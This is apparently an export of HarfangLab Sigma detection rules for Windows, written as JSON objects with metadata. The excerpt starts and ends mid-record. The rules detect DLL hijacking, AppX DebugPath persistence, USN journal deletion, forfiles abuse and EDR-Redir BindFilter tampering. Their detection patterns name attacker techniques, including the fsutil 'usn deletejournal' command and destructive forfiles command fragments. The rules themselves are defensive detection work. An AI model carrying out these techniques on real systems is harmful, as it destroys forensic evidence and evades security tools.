"content": "title: DLL Hijacking via vfhost.exe\nid: 3712739d-e5f9-426a-9faa-810b9f71a278\ndescription: |\n Detects potential Windows DLL Hijacking via vfhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows signed executable from CyberArk's Viewfinity folder to a non-standard directory and planted the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.intrinsec.com/apt27-analysis/\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://cyberark-customers.force.com/s/article/Receiving-a-vf-host-error-upon-login-for-Win-10-machines\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/25\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName:\n - 'vfhost.exe'\n - 'vf_host.exe'\n ProcessSignature: 'CyberArk Software Ltd.'\n ImageLoaded|endswith: 'vftrace.dll'\n # If user has full access rights on these folders, vfhost will not execute.\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\CyberArk'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\CyberArk'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Viewfinity Inc.'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3712739d-e5f9-426a-9faa-810b9f71a278",
"rule_name": "DLL Hijacking via vfhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vfhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows signed executable from CyberArk's Viewfinity folder to a non-standard directory and planted the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-25",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "374a5e08-3010-43b5-845f-e0fcb77c9017",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090149Z",
"creation_date": "2026-03-23T11:45:34.090151Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090156Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/",
"https://attack.mitre.org/techniques/T1546/012/"
],
"name": "t1546_012_persistence_appx_debug_path.yml",
"content": "title: Windows Universal Application Persistence Added\nid: 374a5e08-3010-43b5-845f-e0fcb77c9017\ndescription: |\n Detects the planting of a malicious debug path in universal Windows applications (UWP) known to start at logon (Cortana and People).\n Universal Windows Platform (UWP) apps are applications designed to run across all Windows 10 and later devices, packaged in the AppX format, offering a unified development platform with security and performance features tailored for modern Windows environments.\n Adversaries may use it to establish persistence by executing malicious content at logon.\n It is recommended to investigate the process at the origin of the registry modification as well as the files pointed to by the registry value to determine whether this action is legitimate.\nreferences:\n - https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/\n - https://attack.mitre.org/techniques/T1546/012/\ndate: 2021/02/11\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.012\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject|contains:\n # HKEY_CURRENT_USER\\SOFTWARE\\Classes\\ActivatableClasses\\Package\\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\\DebugInformation\\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca\\DebugPath\n - 'HKU\\\\*\\ActivatableClasses\\Package\\Microsoft.People*\\DebugPath'\n # HKEY_CURRENT_USER\\SOFTWARE\\Classes\\ActivatableClasses\\Package\\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\\DebugInformation\\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca\\DebugPath\n - 'HKU\\\\*\\ActivatableClasses\\Package\\Microsoft.Windows.Cortana*\\DebugPath'\n # 
HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\n - 'HKU\\\\*\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.People*'\n # HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\n - 'HKU\\\\*\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.Windows.Cortana*'\n\n selection_rename:\n EventType: 'RenameKey'\n NewName:\n # HKEY_CURRENT_USER\\SOFTWARE\\Classes\\ActivatableClasses\\Package\\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\\DebugInformation\\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca\\DebugPath\n - 'HKU\\\\*\\ActivatableClasses\\Package\\Microsoft.People*\\DebugPath'\n # HKEY_CURRENT_USER\\SOFTWARE\\Classes\\ActivatableClasses\\Package\\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\\DebugInformation\\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca\\DebugPath\n - 'HKU\\\\*\\ActivatableClasses\\Package\\Microsoft.Windows.Cortana*\\DebugPath'\n # HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\n - 'HKU\\\\*\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.People*'\n # HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\n - 'HKU\\\\*\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.Windows.Cortana*'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "374a5e08-3010-43b5-845f-e0fcb77c9017",
"rule_name": "Windows Universal Application Persistence Added",
"rule_description": "Detects the planting of a malicious debug path in universal Windows applications (UWP) known to start at logon (Cortana and People).\nUniversal Windows Platform (UWP) apps are applications designed to run across all Windows 10 and later devices, packaged in the AppX format, offering a unified development platform with security and performance features tailored for modern Windows environments.\nAdversaries may use it to establish persistence by executing malicious content at logon.\nIt is recommended to investigate the process at the origin of the registry modification as well as the files pointed to by the registry value to determine whether this action is legitimate.\n",
"rule_creation_date": "2021-02-11",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "375c7801-69fe-493d-9e23-6069020b4ab2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087286Z",
"creation_date": "2026-03-23T11:45:34.087288Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087292Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://en.wikipedia.org/wiki/USN_Journal",
"https://attack.mitre.org/techniques/T1070/"
],
"name": "t1070_fsutil_deletejournal.yml",
"content": "title: USN Journal Deleted\nid: 375c7801-69fe-493d-9e23-6069020b4ab2\ndescription: |\n Detects the use of fsutil to delete the USN journal.\n The USN journal (Update Sequence Number Journal) is a feature of the Windows NT file system (NTFS) which maintains a record of changes made to the volume.\n The USN journal is an important forensic element.\n Attackers can delete the USN journal to eliminate evidence of malicious activities.\n It is recommended to investigate the context of the execution and surrounding detections to determine if this action was legitimate.\nreferences:\n - https://en.wikipedia.org/wiki/USN_Journal\n - https://attack.mitre.org/techniques/T1070/\ndate: 2021/04/27\nmodified: 2025/02/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Fsutil\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\fsutil.exe'\n - OriginalFileName: 'fsutil.exe'\n\n selection_commandline:\n CommandLine|contains|all:\n - ' usn '\n - ' deletejournal '\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "375c7801-69fe-493d-9e23-6069020b4ab2",
"rule_name": "USN Journal Deleted",
"rule_description": "Detects the use of fsutil to delete the USN journal.\nThe USN journal (Update Sequence Number Journal) is a feature of the Windows NT file system (NTFS) which maintains a record of changes made to the volume.\nThe USN journal is an important forensic element.\nAttackers can delete the USN journal to eliminate evidence of malicious activities.\nIt is recommended to investigate the context of the execution and surrounding detections to determine if this action was legitimate.\n",
"rule_creation_date": "2021-04-27",
"rule_modified_date": "2025-02-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "37b3b3a7-8dd5-4cd9-a998-3a556640ecaa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082521Z",
"creation_date": "2026-03-23T11:45:34.082523Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082528Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wecutil.yml",
"content": "title: DLL Hijacking via wecutil.exe\nid: 37b3b3a7-8dd5-4cd9-a998-3a556640ecaa\ndescription: |\n Detects potential Windows DLL Hijacking via wecutil.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wecutil.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\WecApi.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "37b3b3a7-8dd5-4cd9-a998-3a556640ecaa",
"rule_name": "DLL Hijacking via wecutil.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wecutil.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "380b79f2-50c9-423b-adc2-7ed80b4ba020",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088047Z",
"creation_date": "2026-03-23T11:45:34.088049Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088053Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_dll_load_from_music_folder.yml",
"content": "title: DLL Loaded from Music Folder\nid: 380b79f2-50c9-423b-adc2-7ed80b4ba020\ndescription: |\n Detects the suspicious loading of a DLL from the Music folder.\n This folder is an uncommon directory for DLL loading and is often abused by attackers.\n It is recommended to analyze the DLL as well as the process loading it to look for malicious content or subsequent malicious actions.\nreferences:\n - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2023/03/13\nmodified: 2025/08/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\Users\\\\*\\Music\\'\n\n exclusion_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Corporation'\n - 'PIRIFORM SOFTWARE LIMITED' # CCleaner\n - 'Piriform Software Ltd' # CCleaner\n - 'Digital Wave Ltd' # FreeAudioConverter\n\n exclusion_landesk:\n ProcessImage:\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\LDISCN32.EXE'\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\GatherProducts.exe'\n\n exclusion_musicbee:\n ProcessOriginalFileName: 'MusicBee.exe'\n ProcessCompany: 'Steven Mayall'\n\n exclusion_audacity:\n Image|endswith: '\\Audacity.exe'\n Signature: 'Musecy SM Ltd.'\n\n exclusion_musescore:\n Image|endswith: '\\MuseScore*.exe'\n\n exclusion_recexperts:\n Image|endswith:\n - '\\RecExperts.exe'\n - '\\infoforsetup.exe'\n - '\\virtualmonitorclient.exe'\n - '\\ffmpegprobe.exe'\n - '\\aliyunwrapexe.exe'\n - '\\firebasefetch.exe'\n Signature: 'CHENGDU YIWO Tech Development Co., Ltd.'\n\n exclusion_various_apps:\n Image|endswith:\n - '\\xmind.exe'\n - '\\libreofficeportable\\app\\libreoffice\\program\\soffice.bin'\n - 
'\\libreofficeportable\\app\\libreoffice\\program\\soffice.exe'\n\n exclusion_ditto:\n ProcessOriginalFileName: 'Ditto'\n ProcessInternalName: 'CP_Main'\n ImageLoaded|endswith: '\\Ditto-*\\Ditto\\\\*.dll'\n\n exclusion_garmin:\n Image: '?:\\Users\\\\*\\Music\\\\*\\Trainer\\G530SIM.exe'\n ImageLoaded|endswith: '\\Garmin\\\\*\\Trainer\\\\*.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "380b79f2-50c9-423b-adc2-7ed80b4ba020",
"rule_name": "DLL Loaded from Music Folder",
"rule_description": "Detects the suspicious loading of a DLL from the Music folder.\nThis folder is an uncommon directory for DLL loading and is often abused by attackers.\nIt is recommended to analyze the DLL as well as the process loading it to look for malicious content or subsequent malicious actions.\n",
"rule_creation_date": "2023-03-13",
"rule_modified_date": "2025-08-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3814d440-2491-4f45-aa78-9e73ec0e45d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070455Z",
"creation_date": "2026-03-23T11:45:34.070457Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070464Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Forfiles/",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_indirect_command_execution_forfiles.yml",
"content": "title: Indirect Command Executed via forfiles.exe\nid: 3814d440-2491-4f45-aa78-9e73ec0e45d2\ndescription: |\n Detects the execution of the legitimate Windows binary forfiles.exe which is a utility to select files and run a command on them.\n Attackers may abuse it to bypass security restrictions or to execute malicious actions on whole folders or filesystems.\n It is recommended to investigate the command that was executed and the process responsible for the execution of forfiles to determine whether this action is legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/\n - https://attack.mitre.org/techniques/T1202/\ndate: 2022/01/21\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Forfiles\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\forfiles.exe'\n ParentCommandLine|contains|all:\n - ' /p '\n - ' /m '\n - ' /c '\n exclusion_legitimate_usage:\n # Batch to delete, copy, move, ... files\n CommandLine|startswith:\n - '/c del '\n - '/c del/q'\n - '/c copy '\n - '/c xcopy '\n - '/c move '\n - '/c ren '\n - '/c mklink /D '\n - '/c erase /F '\n - '/c rmdir '\n - '/c echo '\n - '/c echo.' 
# winPEAS\n - '/c rd /s /q ?:'\n - '/c dir ?:'\n - '/c dir RMAN_BACKUP_'\n - '/c dir/S /b ?:'\n - '/c if TRUE==TRUE rd '\n - '/c if TRUE==TRUE RMDIR '\n - '/c if FALSE==TRUE rd /s /q ?:'\n - '/c if FALSE==TRUE echo '\n - '/c if TRUE==TRUE echo '\n - '/c if TRUE==FALSE del '\n - '/c if FALSE==FALSE echo '\n - '/c if TRUE==FALSE echo '\n - '/c if FALSE==FALSE del '\n - '/c ATTRIB -R -A -S -H ?:'\n - '/c IF TRUE == TRUE rmdir '\n - '/c IF TRUE == TRUE rd '\n - '/c IF TRUE == FALSE rmdir '\n - '/c IF TRUE == FALSE rd '\n - '/c IF FALSE == TRUE rmdir '\n - '/c IF FALSE == TRUE rd '\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe' # no conhost in syswow64 apparently\n # \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1\n CommandLine|contains|all:\n - 'conhost.exe'\n - '0xffffffff'\n\n exclusion_xcopy:\n # Sometimes xcopy is called direclty instead of using cmd /c\n OriginalFileName: \"XCOPY.EXE\"\n\n exclusion_infectioguardian:\n Ancestors|contains: '\\ModuleUtils\\InfectioGuardian\\InfectioGuardian.exe|'\n\n exclusion_legitimate_actions:\n ParentCommandLine:\n # Compression\n - 'forfiles /p * /c cmd /c makecab @path @fname* && echo *@path ... && del @path'\n - 'forfiles /s * /c cmd /c 7z a @fname* @file'\n - 'forfiles /p * /c cmd /c *zip.exe *.zip @file'\n # Archiving\n - 'forfiles /p * -c cmd /c if @isdir gtr true move @path*'\n - 'forfiles /p * /c cmd /c dir @file'\n - 'forfiles /p * /c cmd /c type @file | more'\n - 'forfiles /p * /c cmd /cdir @path'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3814d440-2491-4f45-aa78-9e73ec0e45d2",
"rule_name": "Indirect Command Executed via forfiles.exe",
"rule_description": "Detects the execution of the legitimate Windows binary forfiles.exe which is a utility to select files and run a command on them.\nAttackers may abuse it to bypass security restrictions or to execute malicious actions on whole folders or filesystems.\nIt is recommended to investigate the command that was executed and the process responsible for the execution of forfiles to determine whether this action is legitimate.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3827b403-b9e7-486d-bf89-c0024617c3ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624651Z",
"creation_date": "2026-03-23T11:45:34.624653Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624657Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zerosalarium.com/2025/10/DR-Redir-Break-EDR-Via-BindLink-Cloud-Filter.html",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_potential_bindfilter_redirection_usage.yml",
"content": "title: Potential BindFilter Redirection Usage\nid: 3827b403-b9e7-486d-bf89-c0024617c3ee\ndescription: |\n Detects the loading of specific DLLs related to BindFilter redirection mechanisms, which may indicate attempts to manipulate Windows filter driver bindings for filesystem redirection.\n EDR-Redir, a tool developed by TwoSevenOneT, is known to target EDR solutions by using a BindFilter (mini filter bindflt.sys) and the Windows Cloud Filter API (cldflt.sys) to redirect the EDR's working folder to a folder of the attacker's choice.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://www.zerosalarium.com/2025/10/DR-Redir-Break-EDR-Via-BindLink-Cloud-Filter.html\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/11/03\nmodified: 2025/12/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.HackTool.EDR-Redir\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded: '?:\\Windows\\System32\\bindfltapi.dll'\n ProcessParentImage|contains: '?'\n\n exclusion_svchost:\n Image: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_services:\n Image: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n\n exclusion_tiworker:\n Image: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_dismhost:\n Image:\n - '?:\\$WinREAgent\\Scratch\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\$WINDOWS.~BT\\Work\\\\????????-????-????-????-????????????\\DismHost.exe'\n - 
'?:\\Windows\\SystemTemp\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\Windows\\System32\\Dism\\DismHost.exe'\n - '?:\\W10UIuup\\\\????????-????-????-????-????????????\\DismHost.exe'\n\n exclusion_wuaucltcore:\n Image: '?:\\Windows\\UUS\\\\*\\wuaucltcore.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_repaircenter:\n ProcessCommandLine: 'regsvr32.exe /s ?:\\WINDOWS\\system32\\\\*.dll'\n ProcessParentImage|endswith: '\\Yamicsoft\\RepairCenter.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3827b403-b9e7-486d-bf89-c0024617c3ee",
"rule_name": "Potential BindFilter Redirection Usage",
